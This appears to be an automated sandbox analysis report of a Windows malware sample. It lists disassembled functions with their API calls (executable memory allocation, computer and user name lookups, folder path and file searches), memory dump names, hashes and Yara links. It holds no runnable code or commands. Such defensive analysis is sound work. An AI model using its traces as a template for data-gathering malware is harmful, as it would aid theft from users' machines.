Download Yara Rule

APIs

VirtualAlloc.KERNEL32(?,?,00003000,00000040), ref: 00926706
VirtualAlloc.KERNEL32(00000000,?,00003000,00000040), ref: 00926753

Memory Dump Source

Source File: 00000000.00000002.2260490573.0000000000921000.00000040.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true

Associated: 00000000.00000002.2260471091.0000000000920000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.000000000097A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009A5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009A8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009D1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009DD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A2F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A3B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000AC5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000AE5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000AEB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000B7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000CFF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000DD9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000DFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000E08000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000E17000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261163423.0000000000E18000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261279659.0000000000FAF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261298260.0000000000FB0000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_920000_file.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 01709da71b9402d21f79303ae6e3e0023883bb0eda9fb323567afebaf20ae950
Instruction ID: c102f08565f55570752916d1990166214414604600e283d2cd39a2d1153b7696
Opcode Fuzzy Hash: 01709da71b9402d21f79303ae6e3e0023883bb0eda9fb323567afebaf20ae950
Instruction Fuzzy Hash: A5410B74A00209EFCB44CF98D494BADBBB5FF48314F2486A9E8499B745C735EA81CF84

Function 00935050 Relevance: 2.5, APIs: 2, Instructions: 48stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00938DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00938E0B

lstrcat.KERNEL32(?,00000000), ref: 0093508A
lstrcat.KERNEL32(?,006FE1F0), ref: 009350A8

Part of subcall function 00934910: wsprintfA.USER32 ref: 0093492C
Part of subcall function 00934910: FindFirstFileA.KERNEL32(?,?), ref: 00934943

Memory Dump Source

Source File: 00000000.00000002.2260490573.0000000000921000.00000040.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true

Associated: 00000000.00000002.2260471091.0000000000920000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.000000000097A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009A5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009A8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009D1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009DD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A2F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A3B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000AC5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000AE5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000AEB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000B7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000CFF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000DD9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000DFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000E08000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000E17000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261163423.0000000000E18000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261279659.0000000000FAF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261298260.0000000000FB0000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_920000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$FileFindFirstFolderPathwsprintf
String ID:
API String ID: 2699682494-0
Opcode ID: bbf6e9733931a47d4329d30245bef5cacddce8b47f244bb237be25003310cc57
Instruction ID: 7933db67c9b8525e4f9324ab19b00984ef2567aed2acfc22898d224ac783507e
Opcode Fuzzy Hash: bbf6e9733931a47d4329d30245bef5cacddce8b47f244bb237be25003310cc57
Instruction Fuzzy Hash: D001887690020867CB54FB60DC46FEE733CAB95700F004584F689A71D1EEB5AA888F92

Function 009210A0 Relevance: 2.5, APIs: 2, Instructions: 41memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 009210B3
VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0), ref: 009210F7

Memory Dump Source

Source File: 00000000.00000002.2260490573.0000000000921000.00000040.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true

Associated: 00000000.00000002.2260471091.0000000000920000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.000000000097A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009A5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009A8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009D1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009DD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A2F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A3B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000AC5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000AE5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000AEB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000B7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000CFF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000DD9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000DFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000E08000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000E17000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261163423.0000000000E18000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261279659.0000000000FAF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261298260.0000000000FB0000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_920000_file.jbxd

Yara matches

Similarity

API ID: Virtual$AllocFree
String ID:
API String ID: 2087232378-0
Opcode ID: 7bb5ea39fac9841338571596f1e2ebf5423e401d4eba31f9e6855556ddd91aca
Instruction ID: 2305d3bb32cc39764018fde19265fa43d29b56821256c0f521c884dc6257fdc8
Opcode Fuzzy Hash: 7bb5ea39fac9841338571596f1e2ebf5423e401d4eba31f9e6855556ddd91aca
Instruction Fuzzy Hash: 33F0E271681318BBEB149AA4AC59FBBB7ECE705B15F301848F504E3280D972AE00CAA0

Function 00938D90 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNEL32(00000000,?,00921B54,?,?,0094564C,?,?,00940E1F), ref: 00938D9F

Memory Dump Source

Source File: 00000000.00000002.2260490573.0000000000921000.00000040.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true

Associated: 00000000.00000002.2260471091.0000000000920000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.000000000097A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009A5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009A8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009D1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009DD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A2F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A3B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000AC5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000AE5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000AEB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000B7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000CFF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000DD9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000DFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000E08000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000E17000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261163423.0000000000E18000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261279659.0000000000FAF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261298260.0000000000FB0000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_920000_file.jbxd

Yara matches

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 03349baaf7906cbbaf21940c69c3d92da9ea8b36c739ac2b4606f23ba6be3f32
Instruction ID: 8f116b52faa2009eb4f5c8483e57e5fcc69e9da0438d71112d02b2ed8558a63e
Opcode Fuzzy Hash: 03349baaf7906cbbaf21940c69c3d92da9ea8b36c739ac2b4606f23ba6be3f32
Instruction Fuzzy Hash: 48F0A575C00208EBCF04EFA4D5596EDBB78EB10310F108599E866AB2D0DB745A55DF81

Function 00938DE0 Relevance: 1.5, APIs: 1, Instructions: 23COMMON

Download Yara Rule

APIs

SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00938E0B

Part of subcall function 0093A740: lstrcpy.KERNEL32(00940E17,00000000), ref: 0093A788

Memory Dump Source

Source File: 00000000.00000002.2260490573.0000000000921000.00000040.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true

Associated: 00000000.00000002.2260471091.0000000000920000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.000000000097A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009A5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009A8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009D1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009DD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A2F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A3B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000AC5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000AE5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000AEB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000B7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000CFF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000DD9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000DFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000E08000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000E17000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261163423.0000000000E18000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261279659.0000000000FAF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261298260.0000000000FB0000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_920000_file.jbxd

Yara matches

Similarity

API ID: FolderPathlstrcpy
String ID:
API String ID: 1699248803-0
Opcode ID: adb0a881fd0aa37b5bbebef4d5edae13b0aa2f23e2074c1cbc34c3f1a423441d
Instruction ID: e5476cb488009998e0ca89efb74768a0d835930f0ba9a9a5a8958421ebed080f
Opcode Fuzzy Hash: adb0a881fd0aa37b5bbebef4d5edae13b0aa2f23e2074c1cbc34c3f1a423441d
Instruction Fuzzy Hash: DAE01A31A4034C6BDB91EB90CC96FAE737C9B44B01F004295BA0C9B1C0EE70AB858F91

Function 00921190 Relevance: 1.5, APIs: 1, Instructions: 22COMMON

Download Yara Rule

APIs

Part of subcall function 009378E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00937910
Part of subcall function 009378E0: RtlAllocateHeap.NTDLL(00000000), ref: 00937917
Part of subcall function 009378E0: GetComputerNameA.KERNEL32(?,00000104), ref: 0093792F

Part of subcall function 00937850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,009211B7), ref: 00937880
Part of subcall function 00937850: RtlAllocateHeap.NTDLL(00000000), ref: 00937887
Part of subcall function 00937850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 0093789F

ExitProcess.KERNEL32 ref: 009211C6

Memory Dump Source

Source File: 00000000.00000002.2260490573.0000000000921000.00000040.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true

Associated: 00000000.00000002.2260471091.0000000000920000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.000000000097A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009A5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009A8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009D1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009DD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A2F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A3B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000AC5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000AE5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000AEB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000B7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000CFF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000DD9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000DFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000E08000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000E17000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261163423.0000000000E18000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261279659.0000000000FAF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261298260.0000000000FB0000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_920000_file.jbxd

Yara matches

Similarity

API ID: Heap$Process$AllocateName$ComputerExitUser
String ID:
API String ID: 3550813701-0
Opcode ID: b415cdfc92e17db00bedcc8899f6d90c581e57cc0a06de9292630c9b53b72875
Instruction ID: 1d8f83bd390acee0f21894f8fd31844a64ee707968b09b0f40de293fd252e24d
Opcode Fuzzy Hash: b415cdfc92e17db00bedcc8899f6d90c581e57cc0a06de9292630c9b53b72875
Instruction Fuzzy Hash: 80E012B591430953CE1073F4BC4BB2B369C5B64345F040425FA09E3153FEA9F8208D66

Function 00938E30 Relevance: 1.3, APIs: 1, Instructions: 35memoryCOMMON

Download Yara Rule

APIs

LocalAlloc.KERNEL32(00000040,-00000001), ref: 00938E52

Memory Dump Source

Source File: 00000000.00000002.2260490573.0000000000921000.00000040.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true

Associated: 00000000.00000002.2260471091.0000000000920000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.000000000097A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009A5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009A8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009D1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009DD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A2F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A3B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000AC5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000AE5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000AEB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000B7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000CFF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000DD9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000DFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000E08000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000E17000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261163423.0000000000E18000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261279659.0000000000FAF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261298260.0000000000FB0000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_920000_file.jbxd

Yara matches

Similarity

API ID: AllocLocal
String ID:
API String ID: 3494564517-0
Opcode ID: 913b15939d3f95ff023f79af5f26f12beb431f1199144a6eb05c9f4c4757730e
Instruction ID: c3b07b9a48fb512da213c91b871eebfe5ba2ac2b34b2862f40d3d69996a8f292
Opcode Fuzzy Hash: 913b15939d3f95ff023f79af5f26f12beb431f1199144a6eb05c9f4c4757730e
Instruction Fuzzy Hash: C501F631A04208EFCB14DF98D599BADBBB5EF04708F288488E9056B390C7756E85DF85

Non-executed Functions

Function 6C665440 Relevance: 138.8, APIs: 54, Strings: 25, Instructions: 587threadtimeCOMMON

Download Yara Rule

APIs

getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING), ref: 6C665492
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C6654A8
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C6654BE
__Init_thread_footer.LIBCMT ref: 6C6654DB

Part of subcall function 6C68AB3F: EnterCriticalSection.KERNEL32(6C6DE370,?,?,6C653527,6C6DF6CC,?,?,?,?,?,?,?,?,6C653284), ref: 6C68AB49
Part of subcall function 6C68AB3F: LeaveCriticalSection.KERNEL32(6C6DE370,?,6C653527,6C6DF6CC,?,?,?,?,?,?,?,?,6C653284,?,?,6C6756F6), ref: 6C68AB7C

Part of subcall function 6C68CBE8: GetCurrentProcess.KERNEL32(?,6C6531A7), ref: 6C68CBF1
Part of subcall function 6C68CBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6C6531A7), ref: 6C68CBFA

GetCurrentThreadId.KERNEL32 ref: 6C6654F9
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_HELP), ref: 6C665516
GetCurrentThreadId.KERNEL32 ref: 6C66556A
AcquireSRWLockExclusive.KERNEL32(6C6DF4B8), ref: 6C665577
moz_xmalloc.MOZGLUE(00000070), ref: 6C665585
?ProcessCreation@TimeStamp@mozilla@@SA?AV12@XZ.MOZGLUE(00000000,00000001), ref: 6C665590
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_PROFILER_STARTUP,?,00000001), ref: 6C6655E6
ReleaseSRWLockExclusive.KERNEL32(6C6DF4B8), ref: 6C665606
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C665616

Part of subcall function 6C68AB89: EnterCriticalSection.KERNEL32(6C6DE370,?,?,?,6C6534DE,6C6DF6CC,?,?,?,?,?,?,?,6C653284), ref: 6C68AB94
Part of subcall function 6C68AB89: LeaveCriticalSection.KERNEL32(6C6DE370,?,6C6534DE,6C6DF6CC,?,?,?,?,?,?,?,6C653284,?,?,6C6756F6), ref: 6C68ABD1

GetCurrentThreadId.KERNEL32 ref: 6C66563E
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C665646
exit.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000), ref: 6C66567C
free.MOZGLUE(?), ref: 6C6656AE

Part of subcall function 6C675E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6C675EDB
Part of subcall function 6C675E90: memset.VCRUNTIME140(ewkl,000000E5,?), ref: 6C675F27
Part of subcall function 6C675E90: LeaveCriticalSection.KERNEL32(?), ref: 6C675FB2

getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_PROFILER_STARTUP_NO_BASE), ref: 6C6656E8
GetCurrentThreadId.KERNEL32 ref: 6C665707
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,00000001), ref: 6C66570F
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_PROFILER_STARTUP_ENTRIES), ref: 6C665729
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_PROFILER_STARTUP_DURATION), ref: 6C66574E
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_PROFILER_STARTUP_INTERVAL), ref: 6C66576B
